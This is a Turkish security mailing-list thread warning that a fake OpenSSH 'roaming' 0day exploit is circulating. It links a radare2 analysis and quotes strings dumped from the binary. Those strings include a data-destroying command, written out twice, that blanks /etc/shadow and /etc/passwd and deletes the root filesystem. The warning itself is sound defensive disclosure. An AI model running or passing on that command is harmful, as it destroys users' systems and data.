https://dustri.org/b/how-to-radare2-a-fake-openssh-exploit.html

Belirtiğiniz konuyu yukarıdaki linkte de detaylı olarak işlemişler hocam,
incelemek isteyen arkadaşlar için paylaşıyorum.

18 Ocak 2016 10:31 tarihinde Tacettin Karadeniz <[email protected]>
yazdı:

> OpenSSH "ROAMING" zafiyeti husunda sahte exploit dolaşmaktadır.
> Exploiti deneyim derken sıkıntı yaşamamak gerek.
>
> Exploiti incelerken dikkatimi ceken hususlar aşağıda belirttim.
> *echo "" > /etc/shadow ; echo "" > /etc/passwd ; rm -Rf / *
> kısmına dikkat!!!
>
> Target : openssh 4.7 to 7.1 roaming
> Type   : 0day
> Author : You know me
> Exec   : %s <server> <port>
> - Abort - Need ROOT to bind to raw socket!!
> + OK Starting..
> [ ] Use IP and port (mandatory)
> ;*3$"
> Rfh-c
> h/sh
> h/bin
> echo "" > /etc/shadow ; echo "" > /etc/passwd ; rm -Rf /
> GCC: (Debian 4.9.2-10) 4.9.2
> GCC: (Debian 4.8.4-1) 4.8.4
>
>
>
> -------------------
> DDOS Saldırıları ve Korunma Yolları Eğitimi
>
> İstanbul: 27-28 Şubat 2016
> Ankara: 03-04 Mart 2016
>
> -------------------
>
-------------------
DDOS Saldırıları ve Korunma Yolları Eğitimi

İstanbul: 27-28 Şubat 2016
Ankara: 03-04 Mart 2016

-------------------

Cevap